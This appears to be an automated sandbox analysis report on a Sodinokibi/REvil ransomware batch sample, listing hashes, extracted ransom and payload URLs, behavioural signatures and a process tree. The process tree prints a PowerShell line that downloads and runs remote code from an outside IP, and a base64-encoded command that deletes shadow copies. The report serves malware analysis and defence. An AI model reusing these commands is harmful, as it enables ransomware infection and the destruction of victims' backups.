Analysis
-
max time kernel
122s -
max time network
63s -
platform
windows7_x64 -
resource
win7v200430 -
submitted
02-06-2020 10:10
Static task
static1
Behavioral task
behavioral1
Sample
6d8087f6ec720945a32c8ee912884724.bat
Resource
win7v200430
Behavioral task
behavioral2
Sample
6d8087f6ec720945a32c8ee912884724.bat
Resource
win10v200430
General
-
Target
6d8087f6ec720945a32c8ee912884724.bat
-
Size
222B
-
MD5
f215a676b7ae355bb7b7d9288ef0cac1
-
SHA1
86d732a573f84185b33555e496bcf0b86316f4ac
-
SHA256
47ec07c77cf326da4daa229be123e052dd6dd66171a3b6fb323dce3240b7c7a8
-
SHA512
ec06287d161ea1fe6a44d215a0975a9a3b4570b2c3054e26041bfd6b31e29ef3e73652665a5d91f76cffdcc2b7972381028ac2c7be22a2437300624ea0d42438
Malware Config
Extracted
http://185.103.242.78/pastes/6d8087f6ec720945a32c8ee912884724
Extracted
C:\s9859-readme.txt
sodinokibi
http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/B062B4B7ADC0CAC7
http://decryptor.cc/B062B4B7ADC0CAC7
Signatures
-
Enumerates connected drives 3 TTPs
-
Modifies service 2 TTPs 4 IoCs
Processes:
vssvc.exedescription ioc process Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\Shadow Copy Optimization Writer vssvc.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\Registry Writer vssvc.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\COM+ REGDB Writer vssvc.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\ASR Writer vssvc.exe -
Drops file in Program Files directory 27 IoCs
Processes:
powershell.exedescription ioc process File opened for modification \??\c:\program files\TestRestore.dotm powershell.exe File opened for modification \??\c:\program files\FormatSkip.emz powershell.exe File opened for modification \??\c:\program files\HidePublish.WTV powershell.exe File created \??\c:\program files\microsoft sql server compact edition\v3.5\desktop\s9859-readme.txt powershell.exe File created \??\c:\program files (x86)\s9859-readme.txt powershell.exe File opened for modification \??\c:\program files\SetUnprotect.rtf powershell.exe File opened for modification \??\c:\program files\UnprotectDisable.wmf powershell.exe File opened for modification \??\c:\program files\SubmitDismount.mpp powershell.exe File opened for modification \??\c:\program files\TestCompress.jpeg powershell.exe File created \??\c:\program files\s9859-readme.txt powershell.exe File opened for modification \??\c:\program files\AssertGroup.pot powershell.exe File opened for modification \??\c:\program files\LockClose.wmf powershell.exe File opened for modification \??\c:\program files\RevokeExpand.asx powershell.exe File opened for modification \??\c:\program files\MountImport.mid powershell.exe File opened for modification \??\c:\program files\ResumeStop.ADTS powershell.exe File opened for modification \??\c:\program files\ResumeUse.wma powershell.exe File opened for modification \??\c:\program files\SubmitPush.svgz powershell.exe File opened for modification \??\c:\program files\BlockMount.vsd powershell.exe File created \??\c:\program files\microsoft sql server compact edition\s9859-readme.txt powershell.exe File opened for modification \??\c:\program files\FormatUnlock.eps powershell.exe File opened for modification \??\c:\program files\InstallRegister.dib powershell.exe File opened for modification \??\c:\program files\ProtectConvert.ADTS powershell.exe File created \??\c:\program files\microsoft sql server compact edition\v3.5\s9859-readme.txt powershell.exe File opened for modification \??\c:\program files\ConfirmSubmit.mpeg powershell.exe File opened for modification \??\c:\program files\ConvertPop.mpg powershell.exe File opened for modification \??\c:\program files\EnableStep.iso powershell.exe File opened for modification \??\c:\program files\FindConvertFrom.wmx powershell.exe -
Sets desktop wallpaper using registry 2 TTPs 1 IoCs
Processes:
powershell.exedescription ioc process Set value (str) \REGISTRY\USER\S-1-5-21-910373003-3952921535-3480519689-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1ixm288ukl46j.bmp" powershell.exe -
Suspicious use of AdjustPrivilegeToken 7 IoCs
Processes:
powershell.exepowershell.exevssvc.exedescription pid process Token: SeDebugPrivilege 1076 powershell.exe Token: SeDebugPrivilege 1076 powershell.exe Token: SeDebugPrivilege 756 powershell.exe Token: SeBackupPrivilege 1640 vssvc.exe Token: SeRestorePrivilege 1640 vssvc.exe Token: SeAuditPrivilege 1640 vssvc.exe Token: SeTakeOwnershipPrivilege 1076 powershell.exe -
Suspicious behavior: EnumeratesProcesses 77 IoCs
Processes:
powershell.exepowershell.exepid process 1076 powershell.exe 1076 powershell.exe 1076 powershell.exe 756 powershell.exe 756 powershell.exe 1076 powershell.exe 1076 powershell.exe 1076 powershell.exe 1076 powershell.exe 1076 powershell.exe 1076 powershell.exe 1076 powershell.exe 1076 powershell.exe 1076 powershell.exe 1076 powershell.exe 1076 powershell.exe 1076 powershell.exe 1076 powershell.exe 1076 powershell.exe 1076 powershell.exe 1076 powershell.exe 1076 powershell.exe 1076 powershell.exe 1076 powershell.exe 1076 powershell.exe 1076 powershell.exe 1076 powershell.exe 1076 powershell.exe 1076 powershell.exe 1076 powershell.exe 1076 powershell.exe 1076 powershell.exe 1076 powershell.exe 1076 powershell.exe 1076 powershell.exe 1076 powershell.exe 1076 powershell.exe 1076 powershell.exe 1076 powershell.exe 1076 powershell.exe 1076 powershell.exe 1076 powershell.exe 1076 powershell.exe 1076 powershell.exe 1076 powershell.exe 1076 powershell.exe 1076 powershell.exe 1076 powershell.exe 1076 powershell.exe 1076 powershell.exe 1076 powershell.exe 1076 powershell.exe 1076 powershell.exe 1076 powershell.exe 1076 powershell.exe 1076 powershell.exe 1076 powershell.exe 1076 powershell.exe 1076 powershell.exe 1076 powershell.exe 1076 powershell.exe 1076 powershell.exe 1076 powershell.exe 1076 powershell.exe -
Blacklisted process makes network request 1 IoCs
Processes:
powershell.exeflow pid process 5 1076 powershell.exe -
Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs
Processes:
powershell.exepid process 1076 powershell.exe -
Suspicious use of WriteProcessMemory 5 IoCs
Processes:
cmd.exepowershell.exedescription pid process target process PID 740 wrote to memory of 1076 740 cmd.exe powershell.exe PID 1076 wrote to memory of 756 1076 powershell.exe powershell.exe PID 1076 wrote to memory of 756 1076 powershell.exe powershell.exe PID 1076 wrote to memory of 756 1076 powershell.exe powershell.exe PID 1076 wrote to memory of 756 1076 powershell.exe powershell.exe -
Sodin,Sodinokibi,REvil
Ransomware with advanced anti-analysis and privilege escalation functionality.
Processes
-
C:\Windows\system32\cmd.execmd /c "C:\Users\Admin\AppData\Local\Temp\6d8087f6ec720945a32c8ee912884724.bat"1⤵
- Suspicious use of WriteProcessMemory
PID:740 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeC:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "IEX (New-Object System.Net.WebClient).DownloadString('http://185.103.242.78/pastes/6d8087f6ec720945a32c8ee912884724');Invoke-DHFGQQVRIHKXEIL;Start-Sleep -s 10000"2⤵
- Drops file in Program Files directory
- Sets desktop wallpaper using registry
- Suspicious use of AdjustPrivilegeToken
- Suspicious behavior: EnumeratesProcesses
- Blacklisted process makes network request
- Suspicious behavior: CmdExeWriteProcessMemorySpam
- Suspicious use of WriteProcessMemory
PID:1076 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA==3⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious behavior: EnumeratesProcesses
PID:756
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Modifies service
- Suspicious use of AdjustPrivilegeToken
PID:1640